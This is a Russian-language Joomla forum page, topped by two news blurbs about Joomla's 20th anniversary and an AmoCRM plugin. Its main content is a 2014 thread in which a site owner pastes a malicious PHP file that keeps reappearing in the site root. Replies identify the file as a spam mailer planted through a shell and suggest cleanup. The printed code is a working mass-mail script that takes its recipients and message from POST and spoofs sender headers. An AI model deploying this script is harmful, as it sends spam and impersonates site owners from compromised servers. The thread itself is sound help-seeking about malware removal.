Новости Joomla

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

👩‍💻 20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом взял Евгений Сивоконь.Читать интервью@joomlafeed#joomla #community

20 лет Joomla: Ринат Кажетов

WT AmoCRM - RadicalMart плагин интеграции интернет-магазина на Joomla с CRM

👩‍💻 WT AmoCRM - RadicalMart плагин интеграции интернет-магазина на Joomla с CRM.Плагин умеет отправлять данные заказа из Joomla компонента интернет-магазина RadicalMart в AmoCRM, а так же оставлять примечания к сделке при смене статуса заказа (выберите необходимые статусы заказа RadicalMart в настройках плагина).Возможности плагина - создание сделок в AmoCRM в момент создания заказа в интернет-магазине RadicalMart- выбор воронки AmoCRM, в которой создавать сделки- выбор тега, которым будут помечаться созданные сделки- в комментарий к сделке при создании заказа пишутся:-- точная общая сумма заказа (Amo CRM не принимает дробные значения в поле бюджет, например с копейками)-- статус заказа-- информация о доставке (способ, адрес и комментарий)-- информация о способе оплаты-- контактные данные покупателя (могут отличаться от данных пользователя, создавшего заказ. Например, если доставка для другого человека)-- прямая ссылка на заказ в панели администрирования сайта-- список товаров заказа (опционально)добавление комментария к сделке при изменении статуса заказа в интернет-магазине RadicalMart (выберите необходимые статусы заказа в настройках плагина)-- добавляет в интерфейс просмотра заказа ссылку на сделку в AmoCRM, если таковая обнаружена (соответствие заказов и сделок хранится в базе данных)-- UTM-метки для сделки. Указывает, если на сайте используется комплект плагинов RadicalForm и WT AmoCRM - RadicalForm.
Для работы плагина необходима установка и настройка библиотеки WT Amo CRM library для Joomla версии 1.3.0 и выше.
Плагин бесплатный. Тестировался на Joomla 5.4 и RadicalMart 2.2.4.Страница расширения и скачатьТак же:- Интернет-магазин RadicalMart- WT Amo CRM библиотека интеграции Joomla и AmoCRM- RadicalForm плагин обратной связи- WT AmoCRM - RadicalForm - плагин отправки сообщений из RadicalForm в AmoCRM@joomlafeed#joomla #crm #amocrm #radicalmart

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2324 Просмотров
*

Mangoz

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Генерация php файлов в корень сайта
« : 02.10.2014, 07:06:31 »
Помогите найти очаг вируса. Не могу найти, что генерирует эти файлы в корень сайта. Каким-то образом при переходе по ссылкам сайта меня кидает на сайты буржуйских социалок или фармы. Файлы появляются стабильно 3-4 раза за сутки, после того как их удалишь.



Код одного из файла

Код
<?php

function getDomainFromEmail($email)
{
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}

function random_string($length) {
    $key = '';
    $keys = range('a', 'z');

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key . '.php';
}

if(isset($_POST["to_address"]))
        $to = $_POST["to_address"];
else
	{
	echo "404 error";
	exit;
	}

$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);

set_time_limit (60);
@ignore_user_abort (true);

$to_ar = explode(',', $to);




if(isset($_POST["from_address"]))
{

$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

if(isset($_POST["use_local_domain"]))
{
         $l_domain = gethostname();
         
         $splitPos = strpos($l_domain, "www.");
         if ($splitPos !== false) {
         $l_domain = str_replace('www.', '', $l_domain);
          }

         $from_address = substr($from_address,  0, strpos($from_address, '@')). '@' . $l_domain;
}


//$header =  "MIME-Version: 1.0\r\n";
//$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
//$header .= 'From: ' . '"' . $from_name . '"' .  " <" . $from_address . ">\r\n";
//$header .= "Reply-To: $from_address\r\n";
//$header .= "Return-Path: $from_address\r\n";
//$header .= "X-Mailer: PHP/" . phpversion(). "\r\n" ;

$domain = getDomainFromEmail($email);
$randIP = "".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255);

$from_format = $from_name." <".$from_address.">";

 $header = "Message-Id: <".md5(uniqid(rand())).".".preg_replace("/[^a-z0-9]/i", "", $from_format)."@{$domain}>\r\n";
 $header.= "From: {$from_format}\r\n";
 $header.= "To: {$to}\r\n";
 $header .= "Reply-To: $from_address\r\n";
 $header .= "Return-Path: $from_address\r\n";
// $header.= "Subject: {$subject}\r\n";
 $header.= "Date: ".date("r")."\r\n";
 $header.= "Content-Type: text/plain; charset=iso-8859-1\r\n";
 $header.= "X-Priority: 3\r\n";
 $header.= "X-MSMail-Priority: Normal\r\n";
 $header.= "X-Mailer: PHP - " .phpversion()."\r\n";
 $header.= "X-PHP-Script: ". rand(0,500).":". random_string(rand(3,13)). " for " . $randIP ."\r\n"; 
// $header.= "\r\n";
// $header.= $message;
// $header.= "\r\n.\r\n";




$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}

if($result){echo 'good';}else{echo 'error : '.$result;}
 
?>
Записан
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Re: Генерация php файлов в корень сайта
« Ответ #1 : 02.10.2014, 11:00:49 »
ищите и удаляйте shell, закрывайте уязвимости сайта, это не генерирует а подгружают
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Генерация php файлов в корень сайта
« Ответ #2 : 02.10.2014, 11:13:38 »
Да. Кто-то развлекается.
Записан
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Re: Генерация php файлов в корень сайта
« Ответ #3 : 02.10.2014, 11:14:35 »
Приведенный вами код рассылает спам от вашего имени.
Записан
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Mangoz

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Генерация php файлов в корень сайта
« Ответ #4 : 02.10.2014, 11:54:45 »
В каких файлах может находиться уязвимость?
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Генерация php файлов в корень сайта
« Ответ #5 : 02.10.2014, 14:03:57 »
В общем в самых разнообразных вкратце. Мы же не знаем, что у вас установлено и сколько сайтов на аккаунте.
Записан
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Re: Генерация php файлов в корень сайта
« Ответ #6 : 02.10.2014, 20:30:02 »
Цитата: Mangoz от 02.10.2014, 11:54:45
В каких файлах может находиться уязвимость?
в любом
Записан
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Генерация php файлов в корень сайта
« Ответ #7 : 03.10.2014, 08:23:43 »
Mangoz, если Вы не знакомы хотя бы с основами php - Вам самому это дело не осилить. У меня порой занимает пару-тройку дней чтобы найти уязвимость, полностью очистить сайт и поставить хотя бы базовую защиту.

Но можете попробовать. Воспользуйтесь скриптом айболит - на сегодняшний день это один из  самых эффективных инструментов для работы.
Записан
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Чем лучше всего делать резервные копии сайта?

Автор 7Azimuth

 Ответов: 115
Просмотров: 59454 		Последний ответ 29.11.2023, 14:41:12
от sivers
Joomla 1.5 как убрать кнопку редактировать материант с сайта

Автор andriy465

 Ответов: 5
Просмотров: 4083 		Последний ответ 12.11.2023, 23:37:03
от all_zer
Не могу распаковать jpa архив сайта Akeeba backup. ajax error

Автор smadkz

 Ответов: 4
Просмотров: 1924 		Последний ответ 26.12.2020, 15:15:15
от stendapuss
Версия сайта для слабовидящих

Автор nikos

 Ответов: 22
Просмотров: 44447 		Последний ответ 27.11.2020, 11:04:18
от chernobyl
Поиск статьи по url сайта в админке Joomla 1.5

Автор Tema

 Ответов: 5
Просмотров: 2213 		Последний ответ 14.08.2020, 07:16:44
от rsn